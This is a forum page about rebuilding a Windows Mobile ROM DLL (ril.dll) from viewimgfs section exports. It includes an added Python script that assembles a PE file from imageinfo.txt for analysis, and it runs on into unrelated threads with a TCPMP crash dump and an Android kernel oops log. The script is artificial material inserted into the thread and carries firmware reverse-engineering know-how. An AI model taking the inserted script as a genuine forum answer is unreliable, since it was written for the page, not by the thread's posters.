Dll rebuild - Windows Mobile Development and Hacking General

Does anyone know how to rebuild a system DLL from ROM after exporting it with the viewimgfs tool?
I mean that after the export I have these files:
imageinfo.bin
imageinfo.txt
S000
S001
S002
S003
S004
...I would like to have xyz.dll.
Thanks.
Bye Sektor

I know
Just take any PE editor, take an empty PE file and insert these sections into it, giving them base/RVA/size/etc. from imageinfo.txt. Then edit the PE header (resources/imports/etc.). Of course you'll get a non-working DLL, but you will be able to decompile it or extract resources.
It is easy to make a program that would automatically reconstruct such DLLs, but I'm too lazy for this.

Thanks for your reply.
Can I ask you another little help?
I'm trying to use IDA to decompile my S000 file: when I run it I choose ARM as the processor type, and then it asks me for information about the ROM and the input file. The info required is:
ROM: ROM start address, ROM size
Input file: Loading address, File offset, Loading size
Using the data in imageinfo.txt, attached below, I fill in the form as follows:
ROM start address: 0x01BD0000
ROM size: 0x0004A000
Loading address: 0x01BD1000
File offset: 0x00001000
Loading size: 0x00046158
...but IDA doesn't seem to decompile it correctly.
Could you suggest a good PE editor?
Thanks in advance.
Bye Sektor
[imageinfo.txt]
Module name: ril.dll
e32_objcnt: 00000004
e32_imageflags: 0000212E
e32_entryrva: 000458FC
e32_vbase: 01BD0000
e32_subsysmajor: 00000005
e32_subsysminor: 00000001
e32_stackmax: 00010000
e32_vsize: 0004A000
e32_sect14rva: 00000000
e32_sect14size: 00000000
e32_timestamp: 5598523F
e32_unit[0].rva: 00045D40
e32_unit[0].size: 00001415
e32_unit[1].rva: 00045C24
e32_unit[1].size: 0000003C
e32_unit[2].rva: 00000000
e32_unit[2].size: 00000000
e32_unit[3].rva: 00049000
e32_unit[3].size: 00000DD8
e32_unit[4].rva: 00000000
e32_unit[4].size: 00000000
e32_unit[5].rva: 0004A000
e32_unit[5].size: 00001000
e32_unit[6].rva: 00001000
e32_unit[6].size: 0000001C
e32_unit[7].rva: 00000000
e32_unit[7].size: 00000000
e32_unit[8].rva: 00000000
e32_unit[8].size: 00000000
e32_subsys: 00000009
o32[0].o32_vsize: 00046155
o32[0].o32_rva: 00001000
o32[0].o32_psize: 00046158
o32[0].o32_dataptr: 20000201
o32[0].o32_realaddr: 01BD1000
o32[0].o32_flags: 60002020
o32[1].o32_vsize: 00000558
o32[1].o32_rva: 00048000
o32[1].o32_psize: 00000558
o32[1].o32_dataptr: 00000000
o32[1].o32_realaddr: 01C18000
o32[1].o32_flags: C0002040
o32[2].o32_vsize: 00000DD8
o32[2].o32_rva: 00049000
o32[2].o32_psize: 00000DD8
o32[2].o32_dataptr: 00000000
o32[2].o32_realaddr: 01C19000
o32[2].o32_flags: 40002040
o32[3].o32_vsize: 00001000
o32[3].o32_rva: 0004A000
o32[3].o32_psize: 00000920
o32[3].o32_dataptr: 10000000
o32[3].o32_realaddr: 00000000
o32[3].o32_flags: 42002042

There are lots of PE editors, for example PEditor. Look at protools.cjb.net.
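The reconstruction the reply above describes (put the exported sections into an empty PE with the base/RVA/size values from imageinfo.txt, then fix the header), together with the IDA ROM-dialog values asked about afterwards, as an added example written for this page; it is not code from viewimgfs, from any PE editor, or from the thread's authors. It assumes that each S00x file holds exactly the raw bytes of section o32[x] starting at offset 0, that e32_unit[i] is PE data directory i in standard order, that the machine type is IMAGE_FILE_MACHINE_ARM (0x01C0), and it invents the section names S000, S001, ... because imageinfo.txt carries none. The embedded imageinfo text is the ril.dll dump posted above, trimmed to the fields the script reads; the section contents fed to it in the usage are constructed, not ROM data.

```python
import os
import re
import struct

# Constructed sample: the imageinfo.txt for ril.dll quoted in the thread, trimmed to the fields read here.
SAMPLE_IMAGEINFO = "\n".join([
    "Module name: ril.dll", "e32_objcnt: 00000004", "e32_imageflags: 0000212E",
    "e32_entryrva: 000458FC", "e32_vbase: 01BD0000", "e32_vsize: 0004A000",
    "e32_subsysmajor: 00000005", "e32_subsysminor: 00000001", "e32_subsys: 00000009",
    "e32_stackmax: 00010000", "e32_timestamp: 5598523F",
    "e32_unit[0].rva: 00045D40", "e32_unit[0].size: 00001415",
    "e32_unit[1].rva: 00045C24", "e32_unit[1].size: 0000003C",
    "e32_unit[5].rva: 0004A000", "e32_unit[5].size: 00001000",
    "o32[0].o32_vsize: 00046155", "o32[0].o32_rva: 00001000", "o32[0].o32_psize: 00046158",
    "o32[0].o32_realaddr: 01BD1000", "o32[0].o32_flags: 60002020",
    "o32[1].o32_vsize: 00000558", "o32[1].o32_rva: 00048000", "o32[1].o32_psize: 00000558",
    "o32[1].o32_realaddr: 01C18000", "o32[1].o32_flags: C0002040",
    "o32[2].o32_vsize: 00000DD8", "o32[2].o32_rva: 00049000", "o32[2].o32_psize: 00000DD8",
    "o32[2].o32_realaddr: 01C19000", "o32[2].o32_flags: 40002040",
    "o32[3].o32_vsize: 00001000", "o32[3].o32_rva: 0004A000", "o32[3].o32_psize: 00000920",
    "o32[3].o32_realaddr: 00000000", "o32[3].o32_flags: 42002042",
])

OPT_FMT = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6  # PE32 optional header, 96 bytes
PE_OFFSET = 0x80       # e_lfanew: where the "PE\0\0" signature is placed
MACHINE_ARM = 0x01C0   # IMAGE_FILE_MACHINE_ARM (assumption; a Thumb-only module would be 0x01C2)


def align_up(n, a):
    return (n + a - 1) & ~(a - 1)


def parse_imageinfo(text):
    """Parse viewimgfs imageinfo.txt into (e32 header fields, e32_unit directories, o32 sections)."""
    e32, units, o32 = {}, {}, {}
    for line in text.splitlines():
        m = re.match(r"\s*(.+?):\s*(\S+)\s*$", line)
        if not m:
            continue
        key, val = m.groups()
        if key.startswith("e32_unit["):                 # e32_unit[N].rva / e32_unit[N].size
            idx, field = int(key[9:key.index("]")]), key.rsplit(".", 1)[1]
            units.setdefault(idx, {})[field] = int(val, 16)
        elif key.startswith("o32["):                    # o32[N].o32_vsize, .o32_rva, ...
            idx, field = int(key[4:key.index("]")]), key.rsplit(".o32_", 1)[1]
            o32.setdefault(idx, {})[field] = int(val, 16)
        elif key.startswith("e32_"):
            e32[key[4:]] = int(val, 16)
        else:
            e32[key] = val                              # "Module name"
    return e32, units, [o32[i] for i in sorted(o32)]


def ida_load_params(e32, sec, sec_file_len):
    """IDA ARM ROM dialog values for one S00x file; assumes the file is the section's raw bytes from offset 0."""
    return {"rom_start": e32["vbase"], "rom_size": e32["vsize"],
            "loading_address": e32["vbase"] + sec["rva"],  # equals o32_realaddr for ROM-mapped sections
            "file_offset": 0, "loading_size": min(sec["psize"], sec_file_len)}


def build_pe(e32, units, sections, section_data, align=0x1000):
    """Assemble a minimal PE32 image: FileAlignment equals SectionAlignment so each section's file offset
    is its RVA. The result is for disassemblers and resource tools, not for loading on a device."""
    nsec = len(sections)
    assert PE_OFFSET + 4 + 20 + 96 + 128 + 40 * nsec <= align, "section table overflows the header page"
    # e32_vsize in this dump excludes the relocation section (realaddr 0), so size the image from the table.
    size_of_image = max(align_up(s["rva"] + max(s["vsize"], s["psize"]), align) for s in sections)
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", PE_OFFSET)).ljust(PE_OFFSET, b"\0")
    coff = struct.pack("<HHIIIHH", MACHINE_ARM, nsec, e32.get("timestamp", 0), 0, 0, 224, e32["imageflags"])
    # Assumption: e32_unit[i] is PE data directory i (export, import, resource, exception, ...).
    dirs = b"".join(struct.pack("<II", units.get(i, {}).get("rva", 0), units.get(i, {}).get("size", 0))
                    for i in range(16))
    code = sum(s["psize"] for s in sections if s["flags"] & 0x20)    # IMAGE_SCN_CNT_CODE
    idata = sum(s["psize"] for s in sections if s["flags"] & 0x40)   # IMAGE_SCN_CNT_INITIALIZED_DATA
    opt = struct.pack(OPT_FMT, 0x10B, 0, 0, code, idata, 0, e32["entryrva"], sections[0]["rva"],
                      sections[1]["rva"] if nsec > 1 else 0, e32["vbase"], align, align,
                      4, 0, 0, 0, e32["subsysmajor"], e32["subsysminor"], 0, size_of_image, align, 0,
                      e32["subsys"], 0, e32["stackmax"], 0x1000, 0x100000, 0x1000, 0, 16) + dirs
    table, body = b"", bytearray(size_of_image - align)
    for i, s in enumerate(sections):
        data = section_data.get(i, b"")[:s["psize"]]   # a missing S00x (e.g. stripped .reloc) stays zero-filled
        body[s["rva"] - align:s["rva"] - align + len(data)] = data
        table += struct.pack("<8sIIIIIIHHI", b"S%03d" % i, s["vsize"], s["rva"],   # invented names S000, S001, ...
                             align_up(s["psize"], align), s["rva"], 0, 0, 0, 0, s["flags"])
    return bytes((dos + b"PE\0\0" + coff + opt + table).ljust(align, b"\0") + body)


def rebuild_from_dir(path):
    """Read imageinfo.txt and S000, S001, ... from a viewimgfs export directory and write the DLL."""
    with open(os.path.join(path, "imageinfo.txt")) as f:
        e32, units, sections = parse_imageinfo(f.read())
    files = [os.path.join(path, "S%03d" % i) for i in range(len(sections))]
    data = {i: open(p, "rb").read() for i, p in enumerate(files) if os.path.exists(p)}
    out = os.path.join(path, e32.get("Module name", "rebuilt.dll"))
    with open(out, "wb") as f:
        f.write(build_pe(e32, units, sections, data))
    return out
```

Running `rebuild_from_dir` on the export directory writes a file that a PE-aware disassembler or resource extractor can open directly, with exports, imports and relocations already pointed at by the data directories, which is more than loading S000 alone as a raw ARM ROM segment gives you; `ida_load_params` prints the dialog values for the raw route if you still want it. Section names and the DOS stub are placeholders, the import table is not rebound, and the image base is the ROM address from e32_vbase, so the DLL is for analysis only.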

Related

New problems after updating Mogul firmware

TCPMP:
I get the following in crash.txt:
TCPMP 0.72RC1 crash report
----------------------------
Access violation(c0000005) at 782d49ec 782d49ec)
Read from 782d49ec
cpu dump:
R0 = a22cb3c3
R1 = 00000000
R2 = a22cb3c3
R3 = ffffcbac
R4 = 01a00130
R5 = 00012000
R6 = 00012010
R7 = 00000003
R8 = 179ffed8
R9 = 179ffed8
R10 = 782826a8 (common:000016a8)
R11 = 179ffd04
R12 = a22cb3c3
Sp = 179ffcd8
Lr = 78282798 (common:00001798)
Pc = 782d49ec
Psr = 6000001f
stack dump:
179ffcd8 78253f20
179ffcdc 0001318c
179ffce0 179ffed8
179ffce4 8204eeb0
179ffce8 421b89ee
179ffcec 78253f48
179ffcf0 00000000
179ffcf4 a34f00aa
179ffcf8 ffffc894
179ffcfc 179ffd04
179ffd00 00011108
179ffd04 00000000
179ffd08 00000000
179ffd0c 8389f7e0
179ffd10 00000000
179ffd14 00011424
179ffd18 01ffcc94
179ffd1c 01ffc9e0
179ffd20 179ffed8
179ffd24 a34f00aa
179ffd28 ffffc894
179ffd2c 8001cbd0
179ffd30 00000047
179ffd34 a34f00aa
179ffd38 00000000
179ffd3c 179ffed8
179ffd40 00000005
179ffd44 8389f7e0
179ffd48 00000000
179ffd4c 00011424
179ffd50 01ffcc94
179ffd54 01ffc9e0
179ffd58 179ffed8
179ffd5c a34f00aa
179ffd60 ffffc894
179ffd64 03f68ad8
179ffd68 179ffe44
179ffd6c 03f692e8
179ffd70 00011424
179ffd74 8000001f
179ffd78 01ffcc94
179ffd7c 80032c6c
179ffd80 0000c7b2
179ffd84 8005006c
179ffd88 179fc7b2
179ffd8c 03f6dc40
179ffd90 00000000
179ffd94 00000000
179ffd98 0da03ab8
179ffd9c 0d9e0000
179ffda0 0d9e0030
179ffda4 00000014
179ffda8 82c9fe40
179ffdac 00000000
179ffdb0 00000000
179ffdb4 828a5400
179ffdb8 8034c2d0
179ffdbc 821b89ec
179ffdc0 82c9fe40
179ffdc4 00000000
179ffdc8 f000fe38
179ffdcc 179ffe10
179ffdd0 8001f0ac
179ffdd4 00000000
179ffdd8 00004000
179ffddc 00000010
179ffde0 ffffcb48
179ffde4 ffffc894
179ffde8 00000000
179ffdec 8001f538
179ffdf0 00004000
179ffdf4 00000010
179ffdf8 ffffcb48
179ffdfc a22cb3c2
179ffe00 a34f00aa
179ffe04 00000001
179ffe08 8001c440
179ffe0c 03f68ad8
179ffe10 00000000
179ffe14 0000001f
179ffe18 a34f00aa
179ffe1c 00000000
179ffe20 179ffed8
179ffe24 00000005
179ffe28 01ffc9e0
179ffe2c 00011450
179ffe30 8389f7e0
179ffe34 00000000
179ffe38 00011424
179ffe3c 01ffcc94
179ffe40 03f692e8
179ffe44 00010000
179ffe48 00000000
179ffe4c 00000000
179ffe50 00000000
179ffe54 00000000
179ffe58 00000001
179ffe5c 00000000
179ffe60 00000000
179ffe64 00000000
179ffe68 00000000
179ffe6c 00000000
179ffe70 00000000
179ffe74 00000000
179ffe78 00000000
179ffe7c 00000000
179ffe80 00000000
179ffe84 00000000
179ffe88 00000000
179ffe8c 00000000
179ffe90 f000fe3c
179ffe94 c203fe7c
179ffe98 8003e87c
179ffe9c 8003e8ec
179ffea0 00000000
179ffea4 80000004
179ffea8 00000001
179ffeac 00000004
179ffeb0 8389f7e0
179ffeb4 00000000
179ffeb8 00000000
179ffebc 00010000
179ffec0 006c0070
179ffec4 00790061
179ffec8 00720065
179ffecc 0065002e
179ffed0 00650078
179ffed4 00000000
179ffed8 00000000
179ffedc 00000000
179ffee0 00000000
179ffee4 16000000
179ffee8 00000002
179ffeec 00000001
179ffef0 00020000
179ffef4 00000000
179ffef8 179fd000
179ffefc 179e0000
179fff00 7c090950
179fff04 179ffe50
179fff08 00000000
179fff0c 00000000
179fff10 00000000
179fff14 01a01840
179fff18 00000000
179fff1c 00000000
179fff20 00000000
179fff24 00000000
179fff28 00000000
179fff2c 00000000
179fff30 00000000
179fff34 00000000
179fff38 00000000
179fff3c 00000000
179fff40 00000000
179fff44 00000000
179fff48 00000000
179fff4c 00000000
179fff50 00000000
179fff54 00000000
179fff58 00000000
179fff5c 00000000
179fff60 00000000
179fff64 00000000
179fff68 00000000
179fff6c 00000000
179fff70 00000000
179fff74 00000000
179fff78 00000000
179fff7c 00000000
179fff80 00000000
179fff84 00000000
179fff88 00000000
179fff8c 00000000
179fff90 00000000
179fff94 00000000
179fff98 00000000
179fff9c 00000000
179fffa0 00000000
179fffa4 00000000
179fffa8 00000000
179fffac 00000000
179fffb0 00000000
179fffb4 00000000
179fffb8 00000000
179fffbc 00000000
179fffc0 00000000
179fffc4 00000000
179fffc8 00000000
179fffcc 00000000
179fffd0 00000000
179fffd4 00000000
179fffd8 00000000
179fffdc 00000000
179fffe0 00000000
179fffe4 00000000
179fffe8 00000000
179fffec 00000000
179ffff0 00000000
179ffff4 00000000
179ffff8 00000000
179ffffc 00000000
17a00000 50616548
17a00004 00000000
17a00008 00000000
17a0000c 00002000
17a00010 00000000
17a00014 03f6d4ac
17a00018 03f6d4c0
17a0001c 00000001
17a00020 00000000
17a00024 81ce0438
17a00028 00000000
17a0002c 00000000
17a00030 17a02578
17a00034 17a00030
17a00038 00010c31
17a0003c 17a1dce8
17a00040 17a00000
17a00044 00000000
17a00048 00000000
17a0004c 00000000
17a00050 00000000
17a00054 00000000
17a00058 ffffff80
17a0005c 17a00030
17a00060 0050005c
17a00064 006f0072
17a00068 00720067
17a0006c 006d0061
17a00070 00460020
17a00074 006c0069
17a00078 00730065
17a0007c 0054005c
17a00080 00500043
17a00084 0050004d
17a00088 0069005c
17a0008c 0074006e
17a00090 00720065
17a00094 00610066
17a00098 00650063
17a0009c 0070002e
17a000a0 0067006c
17a000a4 00000000
17a000a8 ffffffd0
17a000ac 17a00030
17a000b0 00790061
17a000b4 00730067
17a000b8 00650068
17a000bc 006c006c
17a000c0 0064002e
17a000c4 006c006c
17a000c8 00000000
17a000cc 00000000
17a000d0 00000000
17a000d4 00000000
common 78281000-782cc000 obj:0 class:30
General (0x01a01600)
Language(16)=1600081477
Platform(23)=PocketPC
Ver(25)=502
OS Version(27)=5.02
OEM Info(24)=TITA100
TypeNo(26)=1
Model(18)=0
Caps(19)=0x00008000
Processor(17)=ARM
Clock speed(34)=390
ICache(20)=32768
DCache(21)=32768
(37)=10
(38)=0
Advanced (0x01a01920)
No backlight keepalive for video(32)=No
Home Screen time out with music playback(45)=No
Old style toolbars(31)=No
No wireless MMX usage(40)=No
Slow video memory(37)=Yes
Less rotation tearing (slower)(41)=No
Prefer lookup tables over arithmetic(38)=Yes
D-Pad follow screen orientation(56)=Yes
Prefer less buffering over smooth video(54)=No
Use system volume(52)=No
Benchmark from current position(48)=No
Override AVI frame rate based on audio(53)=No
Widcomm BT Audio button support(58)=No
Disable AVC deblocking filter(65)=No
Manual A/V offset +/-(44)=0.00 ms
Soft-drop tolerance(42)=54.99 ms
Hard-drop tolerance(43)=699.95 ms
(59)=No
System Timer (0x01a01c70)
Time(96)=0
Speed(98)=100.00%
Play(99)=No
Wave Output (0x01a01e20)
Input(32):IN=empty packet format
Input(32):IN=NULL
Output(33):OUT=empty packet format
Total(34)=0
Dropped(35)=0
Volume(81)=60
Mute(82)=No
(89)=0
Quality(83)=2
(90)=No
(91)= (0x01a01e30)
NULA AOUT p:1 r:1 c: e: p: m:common
OVLA VOUT p:1 r:1 c: e: p: m:common
RAWA FMTB p:1 r:1 c: e: p: m:common
FMTB FMT_ p:1 r:1 c: e: p: m:common
CODC FLOW p:1 r:1 c: e: p: m:common
CCID FLOW p:1 r:1 c: e: p: m:common
NODE p:0 r:1 c: e: p: m:common
FILE STRM p:1 r:1 c:file e: p: m:common
WAVE AOUT p:1 r:1 c: e: p: m:common
RAWI FMTB p:1 r:1 c: e: p: m:common
FMTL FMTM p:1 r:1 c: e: p: m:common
STRM NODE p:1 r:1 c: e: p: m:common
FMTM NODE p:1 r:1 c: e: p: m:common
ADMO CODC p:1 r:1 c: e: p: m:common
STRP FMTM p:1 r:1 c: e: p: m:common
OUTP FLOW p:1 r:1 c: e: p: m:common
ADVP NODE p:1 r:1 c: e: p: m:common
TIMR NODE p:1 r:1 c: e: p: m:common
MEMS STRM p:1 r:1 c: e: p: m:common
PLAT NODE p:1 r:1 c: e: p: m:common
IDCT FLOW p:1 r:1 c: e: p: m:common
SYST TIMR p:1 r:1 c: e: p: m:common
AOUT OUTP p:1 r:1 c: e: p: m:common
VOUT OUTP p:1 r:1 c: e: p: m:common
NULV VOUT p:1 r:1 c: e: p: m:common
FLOW NODE p:1 r:1 c: e: p: m:common
RASX FMTL p:1 r:1 c: e:asx;wmx;wmweb;wmwebasf;wmwebasx;wvx:V;wax:A p:and(text,scan(64,stri('<ASX'),0,fwd)) m:common
PLS_ FMTL p:1 r:1 c:audio/x-scpls,audio/scpls els p:and(text,scan(64,stri('[playlist]'),0,fwd)) m:common
FMT_ FMTM p:1 r:1 c: e: p: m:common
M3U_ FMTL p:1 r:1 c:audio/x-mpegurl,audio/mpegurl e:m3u p:and(text,gt(512,length),or(eq(lines,1),eq(lines,0))) m:common
Bump #1!
Well, aside from the previous post: I found what I thought was a zip file that would work, but I copied it over to the phone and found out it was about 30 MB worth of C++ source code files, with no application included. Does anyone know where I can find a working, compiled, and tested version of TCPMP that works with WM 6.1 on the Titan/Mogul?
Using CAB or OEM
How are you going to load it onto your phone? I am using an OEM. Try these CABs if that is what you use to install, or this OEM. The OEM works for me.
Thank you! Flash videos now play on my phone!

HTC Magic 32A random reboots with any non-htc kernel

Hi, I'm hoping that someone on here has a clue about what's happening with this HTC Magic 32A.
What I'm seeing with ROMs that have a custom kernel (e.g. the bc kernel), such as an Amon_RA or Cyanogen ROM, is that the phone randomly reboots. It could be sitting on the table doing nothing, or it could be in use.
I've used a couple of older ROMs, which included an HTC kernel, and they were always stable.
If it helps, I managed to grab a couple of /proc/last_kmsg dumps after reboots, but I don't really know what's causing the problem.
Code:
[ 358.834381] PM: Syncing filesystems ... done.
[ 358.840209] Freezing user space processes ... (elapsed 0.01 seconds) done.
[ 358.858886] Freezing remaining freezable tasks ... (elapsed 0.00 seconds) done.
[ 358.864990] wakeup wake lock: tiwlan_irq_wake
[ 358.871337] Restarting tasks ... done.
[ 358.877929] suspend: exit suspend, ret = 0 (2009-12-10 03:02:28.507171631 UTC)
[ 358.882080] PM: Syncing filesystems ... done.
[ 358.886291] Freezing user space processes ... (elapsed 0.01 seconds) done.
[ 358.901367] Freezing remaining freezable tasks ... (elapsed 0.00 seconds) done.
[ 358.910675] wakeup wake lock: tiwlan_irq_wake
[ 358.914611] Restarting tasks ... <1>Unable to handle kernel NULL pointer dereference at virtual address 0000001c
[ 358.920684] pgd = cb9b0000
[ 358.920928] [0000001c] *pgd=24b9a031, *pte=00000000, *ppte=00000000
[ 358.922058] Internal error: Oops: 17 [#1] PREEMPT
[ 358.922302] Modules linked in: wlan
[ 358.923004] CPU: 0 Not tainted (2.6.29.6-cm42 #2)
[ 358.923492] PC is at rb_erase+0xdc/0x360
[ 358.923767] LR is at __dequeue_entity+0x38/0x3c
[ 358.924194] pc : [<c0189dd8>] lr : [<c0049bd4>] psr: 20000093
[ 358.924224] sp : c5031d20 ip : c5031d40 fp : c5031d3c
[ 358.924896] r10: 00000000 r9 : c02edb50 r8 : c50f052c
[ 358.925140] r7 : 00000001 r6 : cb9a86d0 r5 : cb9a86f0 r4 : 00040cf1
[ 358.925598] r3 : 00000000 r2 : 0000001c r1 : cb9a86f0 r0 : c03ee198
[ 358.925842] Flags: nzCv IRQs off FIQs on Mode SVC_32 ISA ARM Segment user
[ 358.926269] Control: 00c5387d Table: 24bb0008 DAC: 00000015
[ 358.926513]
[ 358.926513] PC: 0xc0189d58:
[ 358.927185] 9d58 15821000 e5901000 e1540000 e5831000 e5901000 05842004 15842008 e5907004
[ 358.929504] 9d78 e5906008 01a04003 e3d11003 e5837004 e5836008 05853000 0a000003 e5916008
[ 358.931976] 9d98 e1560000 05813008 15813004 e9900042 e5960000 e3510000 e2000003 e1830000
[ 358.934478] 9db8 e5860000 15910000 12000003 11833000 15813000 ea00000e e3520000 e5904000
[ 358.936950] 9dd8 15923000 e204c001 12033003 e3c44003 11833004 15823000 e3540000 05852000
[ 358.939239] 9df8 0a000003 e5943008 e1530000 05842008 15842004 e35c0001 189da8f0 ea000082
[ 358.941711] 9e18 e5943008 e1530002 1a00003b e5943004 e5932000 e3120001 1a000008 e3822001
[ 358.944183] 9e38 e5832000 e5943000 e1a00004 e3c33001 e5843000 e1a01005 ebffff21 e5943004
[ 358.946441]
[ 358.946441] LR: 0xc0049b54:
[ 358.947113] 9b54 13e00015 03a00000 e89da830 c02edb50 e1a0c00d e92dd800 e24cb004 e5903318
[ 358.949584] 9b74 e2611014 e59331c0 e1510003 93a00001 989da800 e3a00017 eb004647 e2500000
[ 358.951904] 9b94 13a00001 e89da800 e1a0c00d e92dd830 e24cb004 e5903024 e2815008 e1530005
[ 358.954376] 9bb4 e1a04000 1a000002 e1a00005 eb05013b e5840024 e1a00005 e2841020 eb050049
[ 358.956848] 9bd4 e89da830 e1a0c00d e92dd8f0 e24cb004 e591301c e1a04001 e3530000 e1a05000
[ 358.959075] 9bf4 0a000029 e5902044 e3a03ffe e0822003 e1c165d0 e1c220d0 e591105c e5940058
[ 358.961547] 9c14 e0522006 e0c33007 e1510003 e1a0c003 8a000002 1a000003 e1500002 9a000001
[ 358.964080] 9c34 e1a02000 e1a0c001 e1c406d0 e5842058 e3a02001 e0900002 e3a03000 e0a11003
[ 358.966369]
[ 358.966369] SP: 0xc5031ca0:
[ 358.966827] 1ca0 c006e248 c006e1d4 c50f02c0 c03ee160 cea01000 914f1a84 ffffffff c5031d0c
[ 358.969329] 1cc0 cb9a86d0 00000001 c5031d3c c5031cd8 c00259ac c0025200 c03ee198 cb9a86f0
[ 358.971588] 1ce0 0000001c 00000000 00040cf1 cb9a86f0 cb9a86d0 00000001 c50f052c c02edb50
[ 358.974060] 1d00 00000000 c5031d3c c5031d40 c5031d20 c0049bd4 c0189dd8 20000093 ffffffff
[ 358.976531] 1d20 cb9a86d0 c03ee198 cb9a86d0 00000001 c5031d5c c5031d40 c0049bd4 c0189d08
[ 358.978820] 1d40 c03ee198 cb9a86d0 00000000 000003f8 c5031d7c c5031d60 c0049dd8 c0049be4
[ 358.981079] 1d60 c50f02c0 c03ee160 c5030000 000003f8 c5031dc4 c5031d80 c02e92bc c0049d54
[ 358.983581] 1d80 002ec000 00000000 c5031dc4 c50f052c c5031e40 00000000 c5031e60 00000000
[ 358.986083]
[ 358.986083] IP: 0xc5031cc0:
[ 358.986541] 1cc0 cb9a86d0 00000001 c5031d3c c5031cd8 c00259ac c0025200 c03ee198 cb9a86f0
[ 358.989044] 1ce0 0000001c 00000000 00040cf1 cb9a86f0 cb9a86d0 00000001 c50f052c c02edb50
[ 358.991333] 1d00 00000000 c5031d3c c5031d40 c5031d20 c0049bd4 c0189dd8 20000093 ffffffff
[ 358.993591] 1d20 cb9a86d0 c03ee198 cb9a86d0 00000001 c5031d5c c5031d40 c0049bd4 c0189d08
[ 358.996063] 1d40 c03ee198 cb9a86d0 00000000 000003f8 c5031d7c c5031d60 c0049dd8 c0049be4
[ 358.998565] 1d60 c50f02c0 c03ee160 c5030000 000003f8 c5031dc4 c5031d80 c02e92bc c0049d54
[ 359.001068] 1d80 002ec000 00000000 c5031dc4 c50f052c c5031e40 00000000 c5031e60 00000000
[ 359.003326] 1da0 c5031e4c c5030000 00000000 c5031e60 c041d7a0 002ec86c c5031ebc c5031dc8
[ 359.005828]
[ 359.005828] FP: 0xc5031cbc:
[ 359.006286] 1cbc c5031d0c cb9a86d0 00000001 c5031d3c c5031cd8 c00259ac c0025200 c03ee198
[ 359.008758] 1cdc cb9a86f0 0000001c 00000000 00040cf1 cb9a86f0 cb9a86d0 00000001 c50f052c
[ 359.011230] 1cfc c02edb50 00000000 c5031d3c c5031d40 c5031d20 c0049bd4 c0189dd8 20000093
[ 359.013732] 1d1c ffffffff cb9a86d0 c03ee198 cb9a86d0 00000001 c5031d5c c5031d40 c0049bd4
[ 359.015991] 1d3c c0189d08 c03ee198 cb9a86d0 00000000 000003f8 c5031d7c c5031d60 c0049dd8
[ 359.018493] 1d5c c0049be4 c50f02c0 c03ee160 c5030000 000003f8 c5031dc4 c5031d80 c02e92bc
[ 359.020965] 1d7c c0049d54 002ec000 00000000 c5031dc4 c50f052c c5031e40 00000000 c5031e60
[ 359.023254] 1d9c 00000000 c5031e4c c5030000 00000000 c5031e60 c041d7a0 002ec86c c5031ebc
[ 359.025726]
[ 359.025726] R0: 0xc03ee118:
[ 359.026397] e118 c03c7a58 c03c7a64 c03c7a70 c03c7a7c c03c7a88 c03c7a94 00003a98 e0131b08
[ 359.028686] e138 00000000 00000000 00000000 00000000 00000000 00000000 00000000 cc44c000
[ 359.031188] e158 cc46ebc0 00000000 0000008d 000030c4 00003d4a 00006848 00006322 00006709
[ 359.033691] e178 00000000 00000000 00000000 00040cf1 00000000 00004015 00af3216 00000000
[ 359.035949] e198 00040cf1 00000000 0000001c 00000000 784ca882 0000001b 8ebd0837 0000002e
[ 359.038421] e1b8 cb79efd8 cb9a86d8 c53e2744 cc582c64 00000000 00000000 00000000 cc582c50
[ 359.040924] e1d8 0000080a c03ee160 c03ee538 cba19188 c03eea58 00000000 00000000 00000000
[ 359.043365] e1f8 00000000 00000010 c03ee200 c03ee200 c03ee208 c03ee208 c03ee210 c03ee210
[ 359.045654]
[ 359.045654] R1: 0xcb9a8670:
[ 359.046325] 8670 00000002 ffffffff 00000000 00000001 ffffffff 00000000 00000000 00000000
[ 359.048583] 8690 00000000 00000000 00000000 00000000 00000000 cb9f0000 00000004 00400140
[ 359.051086] 86b0 00000000 ffffffff 00000078 00000078 00000078 00000000 c02edb50 00000000
[ 359.053558] 86d0 00000400 00400000 c6e0f2b9 c6e39298 00000000 cb806544 c6e392a4 00000001
[ 359.056030] 86f0 8f83f628 00040cf0 a1018b11 00000000 8e2471b7 0000002e a1018b11 00000000
[ 359.058319] 8710 00000000 00000000 00003629 00000000 00000000 00000000 074a5ed5 00000000
[ 359.060821] 8730 00004006 00000000 c2fbde43 00000001 00000000 00000000 eab7f810 00000025
[ 359.063293] 8750 e923f5af 00000047 00000000 00000000 1c7b530e 00000000 009933db 00000000
[ 359.065765]
[ 359.065795] R5: 0xcb9a8670:
[ 359.066253] 8670 00000002 ffffffff 00000000 00000001 ffffffff 00000000 00000000 00000000
[ 359.068695] 8690 00000000 00000000 00000000 00000000 00000000 cb9f0000 00000004 00400140
[ 359.070953] 86b0 00000000 ffffffff 00000078 00000078 00000078 00000000 c02edb50 00000000
[ 359.073455] 86d0 00000400 00400000 c6e0f2b9 c6e39298 00000000 cb806544 c6e392a4 00000001
[ 359.075958] 86f0 8f83f628 00040cf0 a1018b11 00000000 8e2471b7 0000002e a1018b11 00000000
[ 359.078430] 8710 00000000 00000000 00003629 00000000 00000000 00000000 074a5ed5 00000000
[ 359.080718] 8730 00004006 00000000 c2fbde43 00000001 00000000 00000000 eab7f810 00000025
[ 359.083007] 8750 e923f5af 00000047 00000000 00000000 1c7b530e 00000000 009933db 00000000
[ 359.085510]
[ 359.085510] R6: 0xcb9a8650:
[ 359.085968] 8650 00000000 00000000 00000000 00000000 cb9a2640 c6e06680 000006a0 cb9a86a0
[ 359.088439] 8670 00000002 ffffffff 00000000 00000001 ffffffff 00000000 00000000 00000000
[ 359.090942] 8690 00000000 00000000 00000000 00000000 00000000 cb9f0000 00000004 00400140
[ 359.093231] 86b0 00000000 ffffffff 00000078 00000078 00000078 00000000 c02edb50 00000000
[ 359.095489] 86d0 00000400 00400000 c6e0f2b9 c6e39298 00000000 cb806544 c6e392a4 00000001
[ 359.097961] 86f0 8f83f628 00040cf0 a1018b11 00000000 8e2471b7 0000002e a1018b11 00000000
[ 359.100219] 8710 00000000 00000000 00003629 00000000 00000000 00000000 074a5ed5 00000000
[ 359.102722] 8730 00004006 00000000 c2fbde43 00000001 00000000 00000000 eab7f810 00000025
[ 359.105194]
[ 359.105194] R8: 0xc50f04ac:
[ 359.105651] 04ac cbd222a0 cbd222a0 c50f04b4 c50f04b4 c535e49c c535f01c cb9a3200 c50f04c8
